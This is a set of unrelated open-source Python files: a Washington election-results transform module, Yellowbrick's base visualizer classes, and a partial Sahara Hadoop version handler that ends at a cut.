                    contest = Contest.objects.get(**fields)
            except Exception:
                # Replaces bare debug ``print`` statements with the logger.
                logger.error("No contest matching fields {}".format(fields))
                raise
            self._contest_cache[key] = contest
            return contest
class CreateContestsTransform(BaseTransform):
    """Create one Contest per unique (election_id, contest_slug) pair."""

    name = 'create_unique_contests'

    def __call__(self):
        contests = []
        seen = set()
        for result in self.get_raw_results():
            key = self._contest_key(result)
            if key not in seen:
                fields = self.get_contest_fields(result)
                fields['updated'] = fields['created'] = datetime.now()
                contest = Contest(**fields)
                contests.append(contest)
                seen.add(key)
        # BUGFIX: replaces a leftover debug ``print seen`` that dumped the
        # whole key set to stdout on every run.
        logger.debug("Contest keys seen: {}".format(seen))
        Contest.objects.insert(contests, load_bulk=False)
        logger.info("Created {} contests.".format(len(contests)))

    def reverse(self):
        """Delete all previously created Washington contests."""
        old = Contest.objects.filter(state=STATE)
        logger.info('\tDeleting {} previously created contests'.format(old.count()))
        old.delete()

    def _contest_key(self, raw_result):
        """Return the tuple that uniquely identifies a raw result's contest."""
        slug = raw_result.contest_slug
        return (raw_result.election_id, slug)
class CreateCandidatesTransform(BaseTransform):
    """Create one Candidate per unique election/contest/candidate triple."""

    name = 'create_unique_candidates'

    def __call__(self):
        candidates = []
        seen = set()
        for rr in self.get_raw_results():
            key = (rr.election_id, rr.contest_slug, rr.candidate_slug)
            if key not in seen:
                fields = self.get_candidate_fields(rr)
                if not fields['full_name']:
                    # BUGFIX: was ``quit(fields)`` -- the interactive quit()
                    # builtin must not be called from library code (it may
                    # not even exist under ``python -S``); raise instead.
                    raise ValueError(
                        "Could not determine a full name for raw result "
                        "fields: {}".format(fields))
                fields['contest'] = self.get_contest(rr)
                candidate = Candidate(**fields)
                candidates.append(candidate)
                seen.add(key)
        Candidate.objects.insert(candidates, load_bulk=False)
        logger.info("Created {} candidates.".format(len(candidates)))

    def reverse(self):
        """Delete all previously created Washington candidates."""
        old = Candidate.objects.filter(state=STATE)
        # Use the module logger instead of a bare Python 2 print statement,
        # for consistency with the other transforms.
        logger.info("\tDeleting {} previously created candidates".format(old.count()))
        old.delete()
class CreateResultsTransform(BaseTransform):
    """Create one Result per Washington raw result."""

    name = 'create_unique_results'
    auto_reverse = True

    def __init__(self):
        super(CreateResultsTransform, self).__init__()
        # Cache of Candidate lookups keyed by
        # (election_id, contest_slug, candidate_slug).
        self._candidate_cache = {}

    def get_results(self):
        """Return previously created Results for the elections being loaded."""
        election_ids = self.get_raw_results().distinct('election_id')
        return Result.objects.filter(election_id__in=election_ids)

    def __call__(self):
        results = self._create_results_collection()
        for rr in self.get_raw_results():
            fields = self._get_fields(rr, result_fields)
            fields['contest'] = self.get_contest(rr)
            fields['candidate'] = self.get_candidate(rr, extra={
                'contest': fields['contest'],
            })
            # Trust the candidate's contest reference as canonical.
            fields['contest'] = fields['candidate'].contest
            fields['raw_result'] = rr
            party = self.get_party(rr)
            if party:
                fields['party'] = party.abbrev
            fields['jurisdiction'] = self._strip_leading_zeros(rr.jurisdiction)
            fields = self._alter_result_fields(fields, rr)
            result = Result(**fields)
            results.append(result)
        self._create_results(results)

    def _alter_result_fields(self, fields, raw_result):
        """
        Hook to do set additional or alter additional field values
        that will be passed to the Result constructor.
        """
        fields['write_in'] = self._parse_write_in(raw_result)
        fields['ocd_id'] = self._get_ocd_id(raw_result,
            jurisdiction=fields['jurisdiction'])
        return fields

    def _create_results_collection(self):
        """
        Creates the list-like object that will be used to hold the
        constructed Result instances.
        """
        return BulkInsertBuffer(Result)

    def _create_results(self, results):
        """
        Create the Result objects in the database.
        """
        results.flush()
        logger.info("Created {} results.".format(results.count()))

    def reverse(self):
        """Delete all previously loaded results for these elections."""
        old_results = self.get_results()
        logger.info("\tDeleting {} previously loaded results".format(old_results.count()))
        old_results.delete()

    def get_candidate(self, raw_result, extra=None):
        """
        Get the Candidate model for a RawResult

        Keyword arguments:

        * extra - Dictionary of extra query parameters that will
          be used to select the candidate.
        """
        # BUGFIX: the default was a mutable ``{}`` shared across all calls;
        # use None as the sentinel instead.
        if extra is None:
            extra = {}
        key = (raw_result.election_id, raw_result.contest_slug,
            raw_result.candidate_slug)
        try:
            return self._candidate_cache[key]
        except KeyError:
            fields = self.get_candidate_fields(raw_result)
            fields.update(extra)
            # 'source' varies per raw result and is not a candidate field.
            del fields['source']
            try:
                candidate = Candidate.objects.get(**fields)
            except Candidate.DoesNotExist:
                logger.error("No candidate matching fields {}".format(fields))
                raise
            self._candidate_cache[key] = candidate
            return candidate

    def _parse_winner(self, raw_result):
        """
        Converts raw winner value into boolean
        """
        if raw_result.winner == 'Y':
            # Winner in post-2002 contest
            return True
        elif raw_result.winner == 1:
            # Winner in 2002 contest
            return True
        else:
            return False

    def _parse_write_in(self, raw_result):
        """
        Converts raw write-in value into boolean
        """
        if raw_result.write_in == 'Y':
            # Write-in in post-2002 contest
            return True
        elif raw_result.family_name == 'zz998':
            # Write-in in 2002 contest
            return True
        elif raw_result.write_in == "Write-In":
            return True
        elif raw_result.full_name == "Other Write-Ins":
            return True
        else:
            return False

    def _get_ocd_id(self, raw_result, jurisdiction=None, reporting_level=None):
        """
        Returns the OCD ID for a RawResult's reporting level.

        Arguments:

        raw_result: the RawResult instance used to determine the OCD ID
        jurisdiction: the jurisdiction for which the OCD ID should be
            created.
            Default is the raw result's jurisdiction field.
        reporting_level: the reporting level to reflect in the OCD ID.
            Default is raw_result.reporting_level. Specifying this
            argument is useful if you want to use a RawResult's
            jurisdiction, but override the reporting level.
        """
        if reporting_level is None:
            reporting_level = raw_result.reporting_level
        if jurisdiction is None:
            jurisdiction = raw_result.jurisdiction
        juris_ocd = ocd_type_id(jurisdiction)
        if reporting_level == "county":
            # BUGFIX: these OCD IDs previously said ``state:md`` -- clearly
            # copied from the Maryland transforms; this module handles
            # Washington (STATE = 'WA', registered under 'wa').
            return "ocd-division/country:us/state:wa/county:%s" % juris_ocd
        elif reporting_level == "state_legislative":
            return "ocd-division/country:us/state:wa/sldl:%s" % juris_ocd
        elif reporting_level == "precinct":
            county_ocd_id = "/".join(raw_result.ocd_id.split('/')[:-1])
            return "%s/precinct:%s" % (county_ocd_id, juris_ocd)
        else:
            return None
# Register the Washington transforms so the pipeline can discover them.
registry.register('wa', CreateContestsTransform)
registry.register('wa', CreateCandidatesTransform)
registry.register('wa', CreateResultsTransform)
|
|
# yellowbrick.base
# Abstract base classes and interface for Yellowbrick.
#
# Author: Rebecca Bilbro <rbilbro@districtdatalabs.com>
# Author: Benjamin Bengfort <bbengfort@districtdatalabs.com>
# Created: Fri Jun 03 10:20:59 2016 -0700
#
# Copyright (C) 2016 District Data Labs
# For license information, see LICENSE.txt
#
# ID: base.py [4a59c49] benjamin@bengfort.com $
"""
Abstract base classes and interface for Yellowbrick.
"""
import math
import warnings
import matplotlib.pyplot as plt
from .utils.wrapper import Wrapper
from sklearn.base import BaseEstimator
from .exceptions import YellowbrickWarning
from .utils import get_model_name, isestimator
from sklearn.model_selection import cross_val_predict as cvp
from .exceptions import YellowbrickValueError, YellowbrickTypeError
##########################################################################
## Base class hierarchy
##########################################################################
class Visualizer(BaseEstimator):
    """
    The root of the visual object hierarchy that defines how yellowbrick
    creates, stores, and renders visual artifacts using matplotlib.
    Inherits from Scikit-Learn's BaseEstimator class.
    The base class for feature visualization and model visualization
    primarily ensures that styling arguments are passed in.
    Parameters
    ----------
    ax : matplotlib Axes, default: None
        The axis to plot the figure on. If None is passed in the current axes
        will be used (or generated if required).
    kwargs : dict
        Keyword arguments that are passed to the base class and may influence
        the visualization as defined in other Visualizers. Optional keyword
        arguments include:
        ============= =======================================================
        Property      Description
        ------------- -------------------------------------------------------
        size          specify a size for the figure
        color         specify a color, colormap, or palette for the figure
        title         specify the title of the figure
        ============= =======================================================
    Notes
    -----
    Visualizers are objects that learn from data (e.g. estimators), therefore
    they must be ``fit()`` before they can be drawn or used. Visualizers also
    maintain a reference to an ``ax`` object, a matplotlib Axes where the
    figures are drawn and rendered.
    """
    def __init__(self, ax=None, **kwargs):
        # Each assignment below runs through the corresponding property
        # setter (ax, size); any other kwargs are silently discarded.
        self.ax = ax
        self.size = kwargs.pop('size', None)
        self.color = kwargs.pop('color', None)
        self.title = kwargs.pop('title', None)
    ##////////////////////////////////////////////////////////////////////
    ## Primary Visualizer Properties
    ##////////////////////////////////////////////////////////////////////
    @property
    def ax(self):
        """
        The matplotlib axes that the visualizer draws upon (can also be a grid
        of multiple axes objects). The visualizer automatically creates an
        axes for the user if one has not been specified.
        """
        # Lazily fall back to matplotlib's current axes.
        if not hasattr(self, "_ax") or self._ax is None:
            self._ax = plt.gca()
        return self._ax
    @ax.setter
    def ax(self, ax):
        self._ax = ax
    @property
    def size(self):
        """
        Returns the actual size in pixels as set by matplotlib, or
        the user provided size if available.
        """
        # Lazily derive pixels from the current figure: inches * dpi.
        if not hasattr(self, "_size") or self._size is None:
            fig = plt.gcf()
            self._size = fig.get_size_inches()*fig.dpi
        return self._size
    @size.setter
    def size(self, size):
        # size is expected as a (width, height) pair in pixels; setting it
        # immediately resizes matplotlib's current figure.
        self._size = size
        if self._size is not None:
            fig = plt.gcf()
            width, height = size
            width_in_inches = width / fig.get_dpi()
            height_in_inches = height / fig.get_dpi()
            fig.set_size_inches(width_in_inches, height_in_inches)
    ##////////////////////////////////////////////////////////////////////
    ## Estimator interface
    ##////////////////////////////////////////////////////////////////////
    def fit(self, X, y=None, **kwargs):
        """
        Fits a visualizer to data and is the primary entry point for producing
        a visualization. Visualizers are Scikit-Learn Estimator objects, which
        learn from data in order to produce a visual analysis or diagnostic.
        They can do this either by fitting features related data or by fitting
        an underlying model (or models) and visualizing their results.
        Parameters
        ----------
        X : ndarray or DataFrame of shape n x m
            A matrix of n instances with m features
        y : ndarray or Series of length n
            An array or series of target or class values
        kwargs: dict
            Keyword arguments passed to the drawing functionality or to the
            Scikit-Learn API. See visualizer specific details for how to use
            the kwargs to modify the visualization or fitting process.
        Returns
        -------
        self : visualizer
            The fit method must always return self to support pipelines.
        """
        # Base implementation is a no-op; subclasses learn from X, y here.
        return self
    ##////////////////////////////////////////////////////////////////////
    ## Visualizer interface
    ##////////////////////////////////////////////////////////////////////
    def draw(self, **kwargs):
        """
        The fitting or transformation process usually calls draw (not the
        user). This function is implemented for developers to hook into the
        matplotlib interface and to create an internal representation of the
        data the visualizer was trained on in the form of a figure or axes.
        Parameters
        ----------
        kwargs: dict
            generic keyword arguments.
        """
        raise NotImplementedError(
            "Visualizers must implement a drawing interface."
        )
    def finalize(self, **kwargs):
        """
        Finalize executes any subclass-specific axes finalization steps.
        Parameters
        ----------
        kwargs: dict
            generic keyword arguments.
        Notes
        -----
        The user calls poof and poof calls finalize. Developers should
        implement visualizer-specific finalization methods like setting titles
        or axes labels, etc.
        """
        return self.ax
    def poof(self, outpath=None, clear_figure=False, **kwargs):
        """
        Poof makes the magic happen and a visualizer appear! You can pass in
        a path to save the figure to disk with various backends, or you can
        call it with no arguments to show the figure either in a notebook or
        in a GUI window that pops up on screen.
        Parameters
        ----------
        outpath: string, default: None
            path or None. Save figure to disk or if None show in window
        clear_figure: boolean, default: False
            When True, this flag clears the figure after saving to file or
            showing on screen. This is useful when making consecutive plots.
        kwargs: dict
            generic keyword arguments.
        Notes
        -----
        Developers of visualizers don't usually override poof, as it is
        primarily called by the user to render the visualization.
        """
        # Ensure that draw has been called
        # (checks _ax directly to avoid the property creating a new axes).
        if self._ax is None:
            warn_message = (
                "{} does not have a reference to a matplotlib.Axes "
                "the figure may not render as expected!"
            )
            warnings.warn(
                warn_message.format(self.__class__.__name__), YellowbrickWarning
            )
        # Finalize the figure
        self.finalize()
        if outpath is not None:
            plt.savefig(outpath, **kwargs)
        else:
            plt.show()
        if clear_figure:
            plt.gcf().clear()
    ##////////////////////////////////////////////////////////////////////
    ## Helper Functions
    ##////////////////////////////////////////////////////////////////////
    def set_title(self, title=None):
        """
        Sets the title on the current axes.
        Parameters
        ----------
        title: string, default: None
            Add title to figure or if None leave untitled.
        """
        # A title set at construction time wins over the argument.
        title = self.title or title
        if title is not None:
            self.ax.set_title(title)
##########################################################################
## Model Visualizers
##########################################################################
class ModelVisualizer(Visualizer, Wrapper):
    """
    The ModelVisualizer class wraps a Scikit-Learn estimator (usually a
    predictive model like a regressor, classifier, or clusterer) so that all
    functionality that belongs to the estimator can be accessed from the
    visualizer, thereby allowing visualizers to be proxies for model objects,
    simply drawing on behalf of the wrapped model.
    Parameters
    ----------
    model : Estimator
        A Scikit-Learn estimator to wrap functionality for, usually regressor,
        classifier, or clusterer predictive model.
    ax : matplotlib Axes, default: None
        The axis to plot the figure on. If None is passed in the current axes
        will be used (or generated if required).
    kwargs : dict
        Keyword arguments that are passed to the base class and may influence
        the visualization as defined by other Visualizers.
    Notes
    -----
    Model visualizers can wrap either fitted or unfitted models.
    """
    def __init__(self, model, ax=None, **kwargs):
        """
        Parameters
        ----------
        ax: matplotlib axes
            the axis to plot the figure on.
        kwargs: dict
            keyword arguments for Scikit-Learn model
        """
        self.estimator = model
        self.name = get_model_name(self.estimator)
        # Wrapper is initialized before Visualizer; both bases are
        # explicitly initialized since this is multiple inheritance.
        Wrapper.__init__(self, self.estimator)
        Visualizer.__init__(self, ax=ax, **kwargs)
    def fit(self, X, y=None, **kwargs):
        """
        Fits the wrapped estimator so that subclasses that override fit can
        ensure that the estimator is fit using super rather than a direct call
        down to the estimator. Score estimators tend to expect a fitted model.
        Parameters
        ----------
        X : ndarray or DataFrame of shape n x m
            A matrix of n instances with m features
        y : ndarray or Series of length n
            An array or series of target or class values
        kwargs: dict
            Keyword arguments passed to the drawing functionality or to the
            Scikit-Learn API. See visualizer specific details for how to use
            the kwargs to modify the visualization or fitting process.
        Returns
        -------
        self : visualizer
            The fit method must always return self to support pipelines.
        """
        # Note: kwargs are accepted for interface symmetry but are not
        # forwarded to the underlying estimator's fit.
        self.estimator.fit(X, y)
        return self
##########################################################################
## Score Visualizers
##########################################################################
class ScoreVisualizer(ModelVisualizer):
    """
    Reports the performance of a Scikit-Learn estimator (usually a
    predictive model like a regressor, classifier, or clusterer) in a
    visual manner. Score visualizers hook into the Scikit-Learn pipeline
    through the ``score(X_test, y_test)`` method, producing not just a
    single numeric score but a visual report of the score in model space.

    Parameters
    ----------
    model : Estimator
        A Scikit-Learn estimator to wrap functionality for, usually a
        regressor, classifier, or clusterer predictive model.

    ax : matplotlib Axes, default: None
        The axis to plot the figure on. If None is passed in, the current
        axes will be used (or generated if required).

    kwargs : dict
        Keyword arguments passed to the base class that may influence the
        visualization as defined in other Visualizers.

    Notes
    -----
    Score visualizers can wrap either fitted or unfitted models.
    """

    def score(self, X, y, **kwargs):
        """
        The primary entry point for score visualizers: makes predictions
        based on X and scores them relative to y.

        Returns
        -------
        score : float or array-like
            The score of the underlying model, which is model-specific,
            e.g. accuracy for classifiers, R2 for regressors, etc.
        """
        raise NotImplementedError(
            "ScoreVisualizer subclasses should implement score"
        )
##########################################################################
## Multiple Models and Mixins
##########################################################################
class MultiModelMixin(object):
    """
    Mixin for visualizers that compare several models side by side: runs
    predict for each of the models and generates one subplot per model.
    """

    def __init__(self, models, ax=None, **kwargs):
        """
        These parameters can be influenced later on in the visualization
        process, but can and should be set as early as possible.

        Parameters
        ----------
        models: a Scikit-Learn estimator or list of estimators
            the Scikit-Learn models being compared with each other.

        ax: matplotlib Axes, default: None
            the axis to plot the figure on.

        kwargs: dict
            keyword arguments; ``names`` may be passed to label the models,
            otherwise names are derived via ``get_model_name``.
        """
        # TODO: How to handle the axes in this mixin?
        self.ax = ax

        # Ensure models is a collection: if a single estimator was passed,
        # wrap it in a list so that the API doesn't break during render.
        # BUG FIX: the original ``all(isestimator, models)`` always raises
        # TypeError because ``all()`` takes a single iterable argument.
        if isestimator(models):
            models = [models]

        # Keep track of the models
        self.models = models
        self.names = kwargs.pop('names', list(map(get_model_name, models)))

    def generate_subplots(self):
        """
        Generates the subplots for the number of given models, sharing both
        axes so the comparison is visually aligned.
        """
        _, axes = plt.subplots(len(self.models), sharex=True, sharey=True)
        return axes

    def predict(self, X, y):
        """
        Returns a generator containing the predictions for each of the
        internal models (using cross_val_predict and a CV=12).

        Parameters
        ----------
        X : ndarray or DataFrame of shape n x m
            A matrix of n instances with m features

        y : ndarray or Series of length n
            An array or series of target or class values
        """
        for model in self.models:
            yield cvp(model, X, y, cv=12)
class VisualizerGrid(Visualizer):
    """
    Used as a base class for visualizers that use subplots.

    Parameters
    ----------
    visualizers : list of instantiated visualizers, default: None
        The visualizers to lay out on the grid; treated as an empty list
        when None.

    nrows: integer, default: None
        The number of rows desired, if you would like a fixed number of rows.
        Specify only one of nrows and ncols, the other should be None. If you
        specify nrows, there will be enough columns created to fit all the
        visualizers specified in the visualizers list.

    ncols: integer, default: None
        The number of columns desired, if you would like a fixed number of
        columns. Specify only one of nrows and ncols, the other should be
        None. If you specify ncols, there will be enough rows created to fit
        all the visualizers specified in the visualizers list.

    axarr: matplotlib.axarr, default: None.
        If you want to put the plot onto an existing axarr, specify it here.
        Otherwise a new one will be created.

    kwargs : additional keyword arguments, default: None
        Any additional keyword arguments will be passed on to the fit()
        method and therefore passed on to the fit() method of the wrapped
        estimators, if applicable. Otherwise ignored.

    Examples
    --------
    >>> from yellowbrick.base import VisualizerGrid
    >>> from sklearn.linear_model import LogisticRegression
    >>> from yellowbrick.classifier import ConfusionMatrix
    >>> from yellowbrick.classifier import ClassBalance
    >>> model = LogisticRegression()
    >>> visualizers = [ClassBalance(model),ConfusionMatrix(model)]
    >>> mv = VisualizerGrid(visualizers, ncols=2)
    >>> mv.fit(X_train, y_train)
    >>> mv.score(X_test, y_test)
    >>> mv.poof()
    """

    def __init__(self, visualizers=None, nrows=None, ncols=None,
                 axarr=None, **kwargs):
        # Default edge length (in pixels) of each subplot when the user has
        # not specified a size.
        self.SUBPLOT_DEFAULT_PIXELS = 400

        # BUG FIX: avoid a mutable default argument shared across instances.
        self._visualizers = visualizers if visualizers is not None else []
        plotcount = len(self._visualizers)

        # Derive the grid shape from whichever dimension was fixed.
        if nrows is None and ncols is None:
            # TODO: enhancement would be to also allow a 2-d array of
            # visualizers instead of just a 1-d left-to-right +
            # top-to-bottom list
            self.ncols = 1
            self.nrows = plotcount
        elif ncols is None:
            self.nrows = nrows
            self.ncols = int(math.ceil(plotcount / self.nrows))
        elif nrows is None:
            self.ncols = ncols
            self.nrows = int(math.ceil(plotcount / self.ncols))
        else:
            raise YellowbrickValueError(
                "You can only specify either nrows or ncols, the other "
                "will be calculated based on the length of the list of "
                "visualizers.")

        if axarr is None:
            # squeeze=False guarantees a 2-d array even for a 1x1 grid.
            fig, axarr = plt.subplots(self.nrows, self.ncols, squeeze=False)
        self.axarr = axarr

        # Assign an axes object to each visualizer. If len(visualizers)
        # isn't evenly divisible by rows/columns, create the illusion of
        # empty space by hiding the leftover axes.
        idx = 0
        for row in range(self.nrows):
            for col in range(self.ncols):
                try:
                    self.visualizers[idx].ax = self.axarr[row, col]
                except IndexError:
                    self.axarr[row, col].axis('off')
                idx += 1

        self.kwargs = kwargs

    @property
    def visualizers(self):
        # Read-only view of the visualizers supplied at construction time.
        return self._visualizers

    @visualizers.setter
    def visualizers(self, value):
        raise AttributeError(
            "Visualizers list can only be set during class instantiation.")

    @property
    def ax(self):
        """
        Override Visualizer.ax to return the current axis
        """
        return plt.gca()

    @ax.setter
    def ax(self, ax):
        raise YellowbrickTypeError(
            "cannot set new axes objects on multiple visualizers")

    def fit(self, X, y, **kwargs):
        """Fit every wrapped visualizer on the same data; returns self."""
        for vz in self.visualizers:
            vz.fit(X, y, **kwargs)
        return self

    def score(self, X, y):
        """Score every wrapped visualizer on the same data; returns self."""
        for vz in self.visualizers:
            vz.score(X, y)
        return self

    def poof(self, outpath=None, clear_figure=False, **kwargs):
        """
        Finalize every visualizer on the grid and render the figure, either
        to ``outpath`` via savefig or to the screen via show.
        """
        if self.axarr is None:
            return

        # Finalize all visualizers
        for vz in self.visualizers:
            vz.finalize()

        # Choose a reasonable default size if the user has not manually
        # specified one; self.size() uses pixels rather than matplotlib's
        # default of inches.
        if not hasattr(self, "_size") or self._size is None:
            self._width = self.SUBPLOT_DEFAULT_PIXELS * self.ncols
            self._height = self.SUBPLOT_DEFAULT_PIXELS * self.nrows
            self.size = (self._width, self._height)

        if outpath is not None:
            plt.savefig(outpath, **kwargs)
        else:
            plt.show()

        if clear_figure:
            plt.gcf().clear()
|
|
# Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import uuid
from oslo_config import cfg
from oslo_log import log as logging
import six
from sahara import conductor
from sahara import context
from sahara.i18n import _
from sahara.i18n import _LI
from sahara.plugins import exceptions as ex
from sahara.plugins import utils
from sahara.plugins.vanilla import abstractversionhandler as avm
from sahara.plugins.vanilla import utils as vu
from sahara.plugins.vanilla.v1_2_1 import config_helper as c_helper
from sahara.plugins.vanilla.v1_2_1 import edp_engine
from sahara.plugins.vanilla.v1_2_1 import run_scripts as run
from sahara.plugins.vanilla.v1_2_1 import scaling as sc
from sahara.topology import topology_helper as th
from sahara.utils import cluster_progress_ops as cpo
from sahara.utils import edp
from sahara.utils import files as f
from sahara.utils import general as g
from sahara.utils import poll_utils
from sahara.utils import proxy
from sahara.utils import remote
# Rebind the conductor module name to its API handle; all later uses of
# ``conductor`` in this module go through the conductor API.
conductor = conductor.API
# Module-level logger and the global oslo.config configuration object.
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
class VersionHandler(avm.AbstractVersionHandler):
    """Version handler for the Vanilla plugin (Apache Hadoop 1.2.1).

    Implements validation, configuration, startup, scaling and
    decommissioning for clusters running the classic HDFS/MapReduce
    stack plus the optional Oozie and Hive services.
    """

    def get_plugin_configs(self):
        """Return the plugin's user-configurable options."""
        return c_helper.get_plugin_configs()

    def get_node_processes(self):
        """Return the supported node processes grouped by service."""
        return {
            "HDFS": ["namenode", "datanode", "secondarynamenode"],
            "MapReduce": ["tasktracker", "jobtracker"],
            "JobFlow": ["oozie"],
            "Hive": ["hiveserver"]
        }

    def validate(self, cluster):
        """Validate process counts and inter-service dependencies.

        Raises InvalidComponentCountException or
        RequiredServiceMissingException when the topology is invalid.
        """
        nn_count = sum([ng.count for ng
                        in utils.get_node_groups(cluster, "namenode")])
        if nn_count != 1:
            raise ex.InvalidComponentCountException("namenode", 1, nn_count)

        snn_count = sum(
            [ng.count for ng
             in utils.get_node_groups(cluster, 'secondarynamenode')])
        if snn_count > 1:
            raise ex.InvalidComponentCountException('secondarynamenode',
                                                    _('0 or 1'), snn_count)

        jt_count = sum([ng.count for ng
                        in utils.get_node_groups(cluster, "jobtracker")])
        if jt_count > 1:
            raise ex.InvalidComponentCountException("jobtracker", _('0 or 1'),
                                                    jt_count)

        oozie_count = sum([ng.count for ng
                           in utils.get_node_groups(cluster, "oozie")])
        if oozie_count > 1:
            raise ex.InvalidComponentCountException("oozie", _('0 or 1'),
                                                    oozie_count)

        hive_count = sum([ng.count for ng
                          in utils.get_node_groups(cluster, "hiveserver")])
        # tasktracker, oozie and hive all require a jobtracker to be present.
        if jt_count == 0:
            tt_count = sum([ng.count for ng
                            in utils.get_node_groups(cluster, "tasktracker")])
            if tt_count > 0:
                raise ex.RequiredServiceMissingException(
                    "jobtracker", required_by="tasktracker")

            if oozie_count > 0:
                raise ex.RequiredServiceMissingException(
                    "jobtracker", required_by="oozie")

            if hive_count > 0:
                raise ex.RequiredServiceMissingException(
                    "jobtracker", required_by="hive")

        if hive_count > 1:
            raise ex.InvalidComponentCountException("hive", _('0 or 1'),
                                                    hive_count)

    def configure_cluster(self, cluster):
        """Push configuration to every instance of the cluster."""
        instances = utils.get_instances(cluster)
        self._setup_instances(cluster, instances)

    def start_namenode(self, cluster):
        """Format and start the NameNode process."""
        nn = vu.get_namenode(cluster)
        self._start_namenode(nn)

    @cpo.event_wrapper(
        True, step=utils.start_process_event_message("NameNode"))
    def _start_namenode(self, nn_instance):
        with remote.get_remote(nn_instance) as r:
            run.format_namenode(r)
            run.start_processes(r, "namenode")

    def start_secondarynamenodes(self, cluster):
        """Start every SecondaryNameNode (if any), one provisioning step."""
        snns = vu.get_secondarynamenodes(cluster)
        if len(snns) == 0:
            return
        cpo.add_provisioning_step(
            cluster.id,
            utils.start_process_event_message("SecondaryNameNodes"),
            len(snns))

        for snn in snns:
            self._start_secondarynamenode(snn)

    @cpo.event_wrapper(True)
    def _start_secondarynamenode(self, snn):
        run.start_processes(remote.get_remote(snn), "secondarynamenode")

    def start_jobtracker(self, cluster):
        """Start the JobTracker if the cluster has one."""
        jt = vu.get_jobtracker(cluster)
        if jt:
            self._start_jobtracker(jt)

    @cpo.event_wrapper(
        True, step=utils.start_process_event_message("JobTracker"))
    def _start_jobtracker(self, jt_instance):
        run.start_processes(remote.get_remote(jt_instance), "jobtracker")

    def start_oozie(self, cluster):
        """Start Oozie if the cluster has one."""
        oozie = vu.get_oozie(cluster)
        if oozie:
            self._start_oozie(cluster, oozie)

    @cpo.event_wrapper(
        True, step=utils.start_process_event_message("Oozie"))
    def _start_oozie(self, cluster, oozie):
        """Start Oozie (and its MySQL backend if enabled) on its instance."""
        nn_instance = vu.get_namenode(cluster)

        with remote.get_remote(oozie) as r:
            if c_helper.is_mysql_enable(cluster):
                run.mysql_start(r, oozie)
                run.oozie_create_db(r)
            run.oozie_share_lib(r, nn_instance.hostname())
            run.start_oozie(r)
            # BUG FIX: report the Oozie host; the original logged the
            # NameNode's hostname in this message.
            LOG.info(_LI("Oozie service at {host} has been started").format(
                host=oozie.hostname()))

    def start_hiveserver(self, cluster):
        """Start the HiveServer if the cluster has one."""
        hs = vu.get_hiveserver(cluster)
        if hs:
            self._start_hiveserver(cluster, hs)

    @cpo.event_wrapper(
        True, step=utils.start_process_event_message("HiveServer"))
    def _start_hiveserver(self, cluster, hive_server):
        """Prepare the warehouse dir and start the Hive metastore."""
        oozie = vu.get_oozie(cluster)

        with remote.get_remote(hive_server) as r:
            run.hive_create_warehouse_dir(r)
            run.hive_copy_shared_conf(
                r, edp.get_hive_shared_conf_path('hadoop'))

            if c_helper.is_mysql_enable(cluster):
                # MySQL is already running if Oozie lives on the same host.
                if not oozie or hive_server.hostname() != oozie.hostname():
                    run.mysql_start(r, hive_server)
                run.hive_create_db(r, cluster.extra['hive_mysql_passwd'])
                run.hive_metastore_start(r)
                LOG.info(_LI("Hive Metastore server at {host} has been "
                             "started").format(
                                 host=hive_server.hostname()))

    def start_cluster(self, cluster):
        """Start all cluster services in dependency order."""
        self.start_namenode(cluster)

        self.start_secondarynamenodes(cluster)

        self.start_jobtracker(cluster)

        self._start_tt_dn_processes(utils.get_instances(cluster))

        self._await_datanodes(cluster)

        LOG.info(_LI("Hadoop services in cluster {cluster} have been started")
                 .format(cluster=cluster.name))

        self.start_oozie(cluster)

        self.start_hiveserver(cluster)

        LOG.info(_LI('Cluster {cluster} has been started successfully')
                 .format(cluster=cluster.name))
        self._set_cluster_info(cluster)

    @cpo.event_wrapper(
        True, step=_("Await %s start up") % "DataNodes", param=('cluster', 1))
    def _await_datanodes(self, cluster):
        """Poll the NameNode until all DataNodes have registered."""
        datanodes_count = len(vu.get_datanodes(cluster))
        if datanodes_count < 1:
            return

        l_message = _("Waiting on %s datanodes to start up") % datanodes_count
        LOG.info(l_message)
        with remote.get_remote(vu.get_namenode(cluster)) as r:
            poll_utils.plugin_option_poll(
                cluster, run.check_datanodes_count,
                c_helper.DATANODES_STARTUP_TIMEOUT, l_message, 1, {
                    'remote': r,
                    'count': datanodes_count})

    def _generate_hive_mysql_password(self, cluster):
        """Return the cluster's Hive MySQL password, creating it if absent."""
        extra = cluster.extra.to_dict() if cluster.extra else {}
        password = extra.get('hive_mysql_passwd')
        if not password:
            password = six.text_type(uuid.uuid4())
            extra['hive_mysql_passwd'] = password
            conductor.cluster_update(context.ctx(), cluster, {'extra': extra})
        return password

    def _extract_configs_to_extra(self, cluster):
        """Build the per-node-group config payload pushed to instances."""
        oozie = vu.get_oozie(cluster)
        hive = vu.get_hiveserver(cluster)

        extra = dict()

        if hive:
            extra['hive_mysql_passwd'] = self._generate_hive_mysql_password(
                cluster)

        for ng in cluster.node_groups:
            extra[ng.id] = {
                'xml': c_helper.generate_xml_configs(
                    cluster, ng, extra['hive_mysql_passwd'] if hive else None),
                'setup_script': c_helper.generate_setup_script(
                    ng.storage_paths(),
                    c_helper.extract_environment_confs(ng.configuration()),
                    append_oozie=(
                        oozie and oozie.node_group.id == ng.id)
                )
            }

        if c_helper.is_data_locality_enabled(cluster):
            topology_data = th.generate_topology_map(
                cluster, CONF.enable_hypervisor_awareness)
            extra['topology_data'] = "\n".join(
                [k + " " + v for k, v in topology_data.items()]) + "\n"

        return extra

    def decommission_nodes(self, cluster, instances):
        """Gracefully remove DataNode/TaskTracker roles from instances."""
        tts = vu.get_tasktrackers(cluster)
        dns = vu.get_datanodes(cluster)
        decommission_dns = False
        decommission_tts = False

        for i in instances:
            if 'datanode' in i.node_group.node_processes:
                dns.remove(i)
                decommission_dns = True
            if 'tasktracker' in i.node_group.node_processes:
                tts.remove(i)
                decommission_tts = True

        nn = vu.get_namenode(cluster)
        jt = vu.get_jobtracker(cluster)

        if decommission_tts:
            sc.decommission_tt(jt, instances, tts)
        if decommission_dns:
            sc.decommission_dn(nn, instances, dns)

    def validate_scaling(self, cluster, existing, additional):
